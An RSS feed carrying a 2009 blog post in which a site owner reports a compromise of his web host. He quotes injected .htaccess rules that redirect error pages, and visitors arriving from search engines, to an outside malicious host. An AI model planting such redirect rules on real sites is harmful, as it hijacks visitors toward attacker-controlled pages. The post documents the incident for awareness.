<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>the new cube 2.0 &#187; incident</title>
	<atom:link href="http://jiehong.org/blog/tag/incident/feed/" rel="self" type="application/rss+xml" />
	<link>http://jiehong.org/blog</link>
	<description>the new cube 2.0</description>
	<lastBuildDate>Sat, 21 Jan 2012 17:43:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Latest activity</title>
		<link>http://jiehong.org/blog/2009/07/26/latest-activity/</link>
		<comments>http://jiehong.org/blog/2009/07/26/latest-activity/#comments</comments>
		<pubDate>Sun, 26 Jul 2009 02:43:50 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[incident]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=273</guid>
		<description><![CDATA[It&#8217;s been a while since my last entry. A few things was happening, my blog engine went kaput a few weeks ago and it actually affected my Google ranking. I saw a significant drop search engine directed traffic. Recently I discovered some malicious activity on my other web host. I was going through my gallery, [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s been a while since my last entry. A few things was happening, my blog engine went kaput a few weeks ago and it actually affected my Google ranking. <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  I saw a significant drop search engine directed traffic.</p>
<p>Recently I discovered some malicious activity on my other web host. I was going through my gallery, http://jiehong.net/gallery when after a few clicks, I got re-directed to ask.com. I thought I haven&#8217;t renew my subscription or my domain hosting. </p>
<p>After checking my subscriptions, all is fine. I went into cPanel to poke around. What can cause re-directions, I check the re-directions settings, sub-domains etc. Finally I discover some re-directing codes in some of my .htaccess.</p>
<p>Sample:</p>
<blockquote><p>
ErrorDocument 400 http://ake.kz/in.cgi?8<br />
ErrorDocument 401 http://ake.kz/in.cgi?8<br />
ErrorDocument 403 http://ake.kz/in.cgi?8<br />
ErrorDocument 404 http://ake.kz/in.cgi?8<br />
ErrorDocument 500 http://ake.kz/in.cgi?8</p>
<p>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*google.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*ask.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*excite.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*goto.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*search.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*bing.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*dogpile.*<br />
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]
</p></blockquote>
<p>I discovered a folder was created in my public_html, &#8220;coming10/almost&#8221;. What&#8217;s almost, the hacking is almost done ?<br />
I found the following files inside<br />
 &#8211; .htaccess<br />
 &#8211; doing83.html<br />
 &#8211; er404.php<br />
 &#8211; everyting40php<br />
 &#8211; thanks28.html</p>
<p>They all contain encoded javascript to redirect visitors to some site. MY VISITORS ! I reported to my web host, I wonder how much action can they take. They are using ClamAV to scan the /home. Oh well&#8230; I&#8217;m expecting somebody eye-balling the logs to determine the source of entry.</p>
<p>Now I still do not know how they got in, so I need to monitor my site very closely.</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2009/07/26/latest-activity/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

